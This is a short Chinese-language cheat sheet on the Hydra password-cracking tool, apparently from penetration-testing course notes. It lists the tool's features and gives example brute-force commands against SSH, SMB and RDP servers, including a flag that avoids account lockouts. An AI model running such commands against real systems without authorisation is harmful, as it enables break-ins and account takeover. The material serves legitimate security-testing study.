Hydra 是一個強大的密碼破解工具，主要用於測試和評估電腦系統的安全性。它被廣泛用於測試網路、應用程序和服務的安全性，以確保它們不容易受到未經授權的訪問或攻擊。

• 以下是 Hydra 工具的主要特點和功能：

  • 多協議支持：Hydra支援多種協議和服務，包括SSH、FTP、HTTP、RDP、Telnet、SMTP等。這使得它適用於各種不同的測試場景。
  • 多種攻擊模式：Hydra提供了多種攻擊模式，包括字典攻擊、暴力攻擊、蠻力攻擊等，可以根據測試需求選擇不同的攻擊方式。
  • 多線程和並行處理：Hydra可以並行處理多個請求，這使得它能夠加快密碼破解的速度。
  • 自動化和腳本化：用戶可以使用腳本來自動化攻擊，這樣可以更輕鬆地批量測試多個目標。
  • 多平台支援：Hydra可在多個不同的操作系統上運行，包括Linux、Windows和Mac OS。

• 使用範例：

  • 以單一帳號+密碼檔，對目標 SSH 伺服器執行暴力破解攻擊。
    hydra –t 4 –l <username> –P <passwords.txt> ssh://<ssh_IP>
    

  • 以帳號檔+密碼檔，對目標 SSH 伺服器執行暴力破解攻擊。
    hydra –t 4 –L <users.txt> –P <passwords.txt> ssh://<ssh_IP> -u
    -L：帳號檔路徑
    -P：密碼檔路徑
    -u：使用一組密碼 Try 所有帳號後，在 Try 下一組密碼，避免同一個帳號短時間錯太多次(容易被鎖)。
    -t：指定線程數或並行執行的任務數。具體來說，它控制 Hydra 同時執行的密碼破解任務數。

  • 以帳號檔+密碼檔，對目標 SMB 伺服器執行暴力破解攻擊。
    hydra -L Usernames-CPENT.txt -P Passwords-CPENT.txt smb://192.168.103.12

  • 以單一帳號+密碼檔，對目標 SMB 伺服器執行暴力破解攻擊。
    hydra -l administrator -P Passwords-CPENT.txt smb://172.16.30.4
    

  • 以帳號檔+密碼檔，對目標 RDP 伺服器執行暴力破解攻擊。
    hydra -L Usernames-CPENT.txt -P Passwords-CPENT.txt rdp://192.168.103.12